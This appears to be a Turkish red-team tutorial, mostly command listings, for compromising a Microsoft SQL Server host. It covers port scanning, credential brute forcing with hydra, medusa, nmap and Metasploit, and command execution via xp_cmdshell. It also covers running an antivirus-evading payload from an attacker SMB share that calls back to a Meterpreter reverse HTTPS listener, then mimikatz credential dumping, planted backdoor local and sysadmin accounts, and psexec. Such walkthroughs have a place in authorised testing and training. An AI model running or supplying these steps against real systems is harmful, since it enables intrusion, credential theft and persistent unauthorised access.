Yazının devamı için bakınız:
http://www.siberportal.org/red-team/anti-virus-evasion-techniques/acquiring-meterpreter-shell-by-using-msf-web-delivery-exploit-module/
1) MSSQL sunucunun IP adresi tespit edilecektir.
2) Veritabanı üzerinde yetkili bir hesabın kimlik bilgileri, farklı araçlarla (hydra aracı, nmap aracı, MSF mssql_login modülü) kaba kuvvet saldırıları ile elde edilecektir.
3) Elde edilen kimlik bilgilerini kullanarak NMAP ms-sql-xp-cmdshell betiği ile işletim sisteminde komut çalıştırılacak ve MSF mssql_payload modülü ile Meterpreter bağlantısı elde edilecektir.
nmap 172.22.71.0/24 -sS -Pn -n --open -p 1433
medusa -h 172.22.71.247 -U /root/Desktop/kullanicilar -P /root/Desktop/parolalar -O /root/Desktop/medusa_sonuclar -M mssql -n 1433
hydra mssql://172.22.71.247:1433 -L /root/Desktop/kullanicilar -P /root/Desktop/parolalar -o /root/Desktop/hydra_sonuclar
nmap 172.22.71.247 -p1433 --script ms-sql-brute --script-args userdb=/root/Desktop/kullanicilar,passdb=/root/Desktop/parolalar -oN /root/Desktop/hydra_sonuclar
search mssql_login
use auxiliary/scanner/mssql/mssql_login
show options
set RHOSTS 172.22.71.247
set USER_FILE /root/Desktop/kullanicilar
set PASS_FILE /root/Desktop/parolalar
show options
run
nmap 172.22.71.247 -p1433 --script ms-sql-xp-cmdshell --script-args=mssql.username=test,mssql.password=test,ms-sql-xp-cmdshell.cmd='whoami && net user'
search mssql_payload
use exploit/scanner/mssql/mssql_payload
show options
set RHOST 172.22.71.247
set USERNAME test
set PASSWORD test
show options
run
getuid
background
sessions
1) Saldırgan makinesinde kurban makinenin erişebileceği bir paylaşım açılacaktır.
2) Antivirüslere yakalanmayan ve Meterpreter bağlantısı sağlayacak bir uygulama hazırlanarak saldırgan makinesindeki paylaşıma kaydedilecektir.
3) MSF multi/handler modülü ile Meterpreter bağlantısı dinlenecektir.
4) MSF "mssql_exec" modülü kullanılarak kurban makinede saldırgan makine paylaşımındaki uygulama çalıştırılacak, Kali makinedeki listener ile bağlantı elde edilecektir. Böylece kurban bilgisayarına Meterpreter ile ters bir bağlantı sağlanmış olacaktır.
mkdir -p /root/veil-output/compiled/
chmod 777 /root/veil-output/compiled/
[paylasim$]
comment = Sizma testleri icin hazirlanmistir.
path = /root/veil-output/compiled/
browseable = yes
guest ok = yes
read only = yes
public = yes
writable = yes
service samba start
use exploit/multi/handler
show options
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 172.22.71.5
set LPORT 443
set ExitOnSession false
exploit -j
search mssql_exec
use auxiliary/admin/mssql/mssql_exec
show options
set CMD start \\\\172.22.71.5\\paylasim$\\Zararli1.exe
set RHOST 172.22.71.247
set PASSWORD s93v43jd5
show options
run
1) İşletim sistemindeki yerel kullanıcıların parolaları değiştirilerek
2) Servisi çalıştıran hesabın parolası elde edilerek
3) İşletim sistemindeki belli bir yerel gruba üye olunarak
4) Windows sqlcmd aracıyla yeni bir hesap oluşturarak
5) MSF mssql_local_auth_bypass post exploit modülü ile
net user
net user Birkan Bb123456
mimikatz
privilege::debug
sekurlsa::wdigest
net localgroup
net localgroup "SQL Yoneticileri" Hacked /add
psexec /s cmd
sqlcmd -S localhost
USE [master]
GO
CREATE LOGIN [sa_hacked] WITH PASSWORD=N'Hh123456'
GO
EXEC master..sp_addsrvrolemember @loginame = N'sa_hacked', @rolename = N'sysadmin'
GO
use exploit/windows/smb/psexec
set RHOST 172.22.71.247
set SMBUSER Hacked
set SMBPASS Hh123456
exploit
getuid
background
search mssql_local_auth_bypass
use post/windows/manage/mssql_local_auth_bypass
show options
set DB_USERNAME yeni_sa
set DB_PASSWORD yeni_sa_Mssql123
set SESSION 1
run
use post/windows/manage/mssql_local_auth_bypass
set DB_USERNAME yeni_sa
set DB_PASSWORD RastgeleParola
set SESSION 1
set REMOVE_LOGIN true
run